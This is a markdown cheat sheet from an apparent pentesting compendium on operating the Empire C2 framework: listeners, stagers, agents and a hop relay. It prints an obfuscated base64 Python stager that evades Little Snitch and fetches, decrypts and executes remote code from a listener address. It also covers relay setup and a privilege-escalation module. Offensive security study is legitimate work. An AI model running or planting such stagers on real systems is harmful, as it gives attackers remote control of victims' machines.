killchain-compendium/post_exploitation/docs/empire.md

83 lines
3.0 KiB
Markdown
Raw Normal View History

2021-08-23 01:13:54 +02:00
# Empire C2
2021-09-24 00:54:18 +02:00
* [Empire Repo](https://github.com/BC-SECURITY/Empire.git)
2021-08-23 01:13:54 +02:00
2021-09-24 00:54:18 +02:00
## Start Client and Server
```sh
poetry run python empire --server --rest --notifications
poetry run python empire.py client
```
## Parts
* __Listeners__ receive connections from stagers
* __Stagers__ payloads generated, for example a reverse, delivery mechanism for agents
* __Agents__ remote on target device tasks
* __Modules__ use modularized payload on agents
* __Credentials__
* __Report__ information on devices
2021-08-23 01:13:54 +02:00
* Results are stored in a DB
## Commands
### uselistener
* Example
```sh
uselistener http
```
* msf like commands, run listener
```sh
set <option> <value>
options
execute
```
* go back to main menu
```sh
back
main
```
* Check `listeners`
* `kill <listener>`
### usestager
```sh
usestager multi/launcher
usestager multi/bash
```
* Set the listener created under `uselistener`
```sh
set Listener <Listener>
```
* `execute`, output is for example:
```sh
echo "import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsIHN0ZGVycj1zdWJwcm9jZXNzLlBJUEUpCm91dCwgZXJyID0gcHMuY29tbXVuaWNhdGUoKQppZiByZS5zZWFyY2goIkxpdHRsZSBTbml0Y2giLCBvdXQuZGVjb2RlKCdVVEYtOCcpKToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliLnJlcXVlc3Q7ClVBPSdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbyc7c2VydmVyPSdodHRwOi8vMTAuNTAuMTg0LjQ5OjgwMDAnO3Q9Jy9uZXdzLnBocCc7cmVxPXVybGxpYi5yZXF1ZXN0LlJlcXVlc3Qoc2VydmVyK3QpOwpwcm94eSA9IHVybGxpYi5yZXF1ZXN0LlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliLnJlcXVlc3QuYnVpbGRfb3BlbmVyKHByb3h5KTsKby5hZGRoZWFkZXJzPVsoJ1VzZXItQWdlbnQnLFVBKSwgKCJDb29raWUiLCAic2Vzc2lvbj16bWNwNFJXb3d1MU9majBEa0dQVkZaK0RKTUE9IildOwp1cmxsaWIucmVxdWVzdC5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIucmVxdWVzdC51cmxvcGVuKHJlcSkucmVhZCgpOwpJVj1hWzA6NF07ZGF0YT1hWzQ6XTtrZXk9SVYrJ0NqT2cyUzpvbSp5PSg0YVs5LkBaVzNEP2ROTEdlez5CJy5lbmNvZGUoJ1VURi04Jyk7UyxqLG91dD1saXN0KHJhbmdlKDI1NikpLDAsW10KZm9yIGkgaW4gbGlzdChyYW5nZSgyNTYpKToKICAgIGo9KGorU1tpXStrZXlbaSVsZW4oa2V5KV0pJTI1NgogICAgU1tpXSxTW2pdPVNbal0sU1tpXQppPWo9MApmb3IgY2hhciBpbiBkYXRhOgogICAgaT0oaSsxKSUyNTYKICAgIGo9KGorU1tpXSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCiAgICBvdXQuYXBwZW5kKGNocihjaGFyXlNbKFNbaV0rU1tqXSklMjU2XSkpCmV4ZWMoJycuam9pbihvdXQpKQ=='));" | python3 &
```
* run this on the target
### agents
* `agents` checks the deployed agents
* `interact <AgentName>`
* `help` in interaction context
* `kill <AgentName>`
## Create Hop Listener
```sh
uselistener http_hop
```
```sh
set RedirectListener <ExistingListenerName>
```
```sh
set Host <IPofRelay>
```sh
set Port <PortonRelay>
```
* `execute` and check files under `/tmp/http_hop/news.php`, `/tmp/http_hop/admin/get.php`, `/tmp/http_hop/login/process.php`
* `usestager multi/handler`
* `set Listener http_hop`
* on Relay: `php -S 0.0.0.0:PORT &>/dev/null &`
* usemodule powershell/privesc/sherlock on agent for example
### Interactive shell